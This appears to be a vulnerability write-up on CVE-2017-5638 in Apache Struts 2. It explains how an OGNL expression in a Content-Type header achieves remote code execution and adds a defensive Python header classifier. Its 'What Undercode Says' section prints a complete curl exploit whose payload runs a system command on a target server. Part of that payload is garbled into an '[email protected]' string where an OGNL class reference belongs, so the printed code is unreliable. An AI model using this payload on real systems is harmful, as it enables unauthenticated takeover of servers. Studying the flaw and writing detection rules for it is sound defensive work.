CVE-2017-5638 is a critical remote code execution vulnerability in Apache Struts 2 caused by flawed error handling in the Jakarta Multipart parser. The exploit sends a maliciously crafted `Content-Type` HTTP header to a server that processes file uploads. When the header value is invalid, the parser builds an error message that includes that value, and the message is then interpreted as an Object-Graph Navigation Language (OGNL) expression. An attacker can therefore place OGNL code directly in the `Content-Type` header. Because OGNL expressions can execute arbitrary system commands with the privileges of the Struts application, the parser evaluates and runs the injected code. The request needs no authentication, so a successful exploit gives the attacker control of the vulnerable system.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical
Date: March 2017
Prediction: Patch Available
What Undercode Says:
`curl -H "Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context['com.opensymphony.xwork2.ActionContext.container']).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='id').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}" http://target.com/struts2-blank/example/Upload.action`
How the Exploit Works:
Malicious HTTP Request
Crafted Content-Type Header
OGNL Expression Injection
Protection from this CVE:
Patch Struts
Upgrade Version
Input Validation
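As an added example (not part of the original post or of Apache Struts), the following Python checks what a WAF rule or log monitor would look for when screening `Content-Type` headers for this bug: a well-formed media type passes, while anything carrying an OGNL expression marker (`%{` or `${`) or not matching the media-type grammar is flagged. The sample header values are constructed for the demonstration.

```python
import re

# A token character as defined for HTTP header fields (RFC 7230 tchar).
TCHAR = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]"

# type "/" subtype, followed by any number of ";name=value" parameters,
# where a value may be a token or a quoted string.
MEDIA_TYPE_RE = re.compile(
    rf"^{TCHAR}+/{TCHAR}+"
    rf"(\s*;\s*{TCHAR}+=({TCHAR}+|\"[^\"]*\"))*"
    r"\s*$"
)

# Constructed sample values; the fourth mirrors the shape of the OGNL payload
# described above, the fifth is a minimal expression, the sixth is merely broken.
SAMPLE_HEADERS = [
    "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW",
    "application/x-www-form-urlencoded",
    'text/plain; charset="utf-8"',
    "%{(_='multipart/form-data').(cmd='id')}",
    "${1+1}",
    "text/html; charset",
]


def classify_content_type(value):
    """Return 'ognl' for an expression marker, 'ok' for a valid media type,
    otherwise 'malformed' (the case that made vulnerable Struts build the
    error message that was then evaluated)."""
    if "%{" in value or "${" in value:
        return "ognl"
    return "ok" if MEDIA_TYPE_RE.match(value) else "malformed"


def scan(headers):
    """Classify every header value, keeping the value alongside its verdict."""
    return [(v, classify_content_type(v)) for v in headers]


def alerts(headers):
    """Values worth alerting on: anything that is not a well-formed media type."""
    return [v for v in headers if classify_content_type(v) != "ok"]


if __name__ == "__main__":
    for value, verdict in scan(SAMPLE_HEADERS):
        print(f"{verdict:9s} {value}")
```

Because the vulnerable code evaluated the header only after rejecting it as invalid, rejecting malformed values at the edge, not just ones containing `%{`, closes the same path.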
Impact:
Remote Code Execution
Full System Compromise
Unauthenticated Attack
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode